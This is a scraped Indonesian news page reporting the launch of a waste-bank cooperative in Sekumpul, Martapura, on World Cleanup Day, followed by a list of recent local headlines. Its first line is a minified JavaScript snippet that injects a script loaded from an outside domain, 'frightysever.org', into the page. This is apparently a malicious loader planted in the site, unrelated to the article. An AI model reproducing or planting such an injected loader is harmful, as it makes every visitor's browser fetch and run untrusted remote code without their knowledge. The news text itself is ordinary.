(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Banjar

World Cleanup Day, Koperasi Sirqoh Muawwanah Bank Sampah Sekumpul Diresmikan


KANALKALIMANTAN.COM, MARTAPURA – Memperingati World Cleanup Day pada 19 September, Bank Sampah Sekumpul luncurkan program Gerakan Pilah Sampah dari rumah, sekaligus tukar sampah dengan sembako.

Kegiatan ini dilakukan melalui koperasi Sirqoh Muawwanah, yang berada di Jalan Pendidikan, Gang Berkat Tawakal, Kelurahan Sekumpul Martapura Kabupaten Banjar.

Peresmian Koperasi Sirqoh Muawwanah Bank Sampah Sekumpul, ditandai dengan pemotongan pita oleh Kepala Dinas Lingkungan Hidup (DLH) Kabupaten Banjar, Boyke Wahyu Tristiyanto, didampingi Syamsu dari PT. PLN Wilayah Kalselteng.

Direktur Bank Sampah Sekumpul Dewi Heldayati menyatakan, dengan diluncurkannya program ini harapannya masyarakat bisa semakin menyadari dampak negatif apabila sampah itu tidak dikelola dengan baik.

“Kami membuka kesempatan kepada warga, untuk bisa menabung sampah dengan saldo yang bisa ditukarkan dengan sembako di koperasi,” katanya.

Sementara itu, Lurah Sekumpul Gusti Marhusin kepada kanalkalimantan.com, mengatakan, menjadi kewajiban bersama untuk peduli pada lingkungan sekitar terutama limbah sampah.

“Kedepannya pihak kami akan terus mengedukasi masyarakat terkait betapa pentingnya kebersihan dan kesehatan,” ungkapnya.

”Insyallah target kami kedepannya, agar seluruh warga di sini bisa menjadi bagian dari Bank Sampah dan untuk bulan Januari tahun depan Insya Allah truk angkutan sampah tidak akan masuk lagi di Kelurahan Sekumpul,” tegasnya.

Dalam kegiatan kali ini, juga dilakukan penyerahan sampah secara simbolis dari Kepala DLH Banjar kepada Direktur Bank Sampah Sekumpul, serta penandatanganan MoU kerjasama antara Lurah Sekumpul dengan Direktur Bank Sampah Sekumpul.

Sejauh ini sudah ada sekitar 2.500 kepala keluarga yang menjadi nasabah Bank Sekumpul. (Kanalkalimantan.com/Wahyu)

 

Reporter: Wahyu
Editor: Cell


Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

9 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

11 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

14 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

14 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

16 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

17 jam ago

This website uses cookies.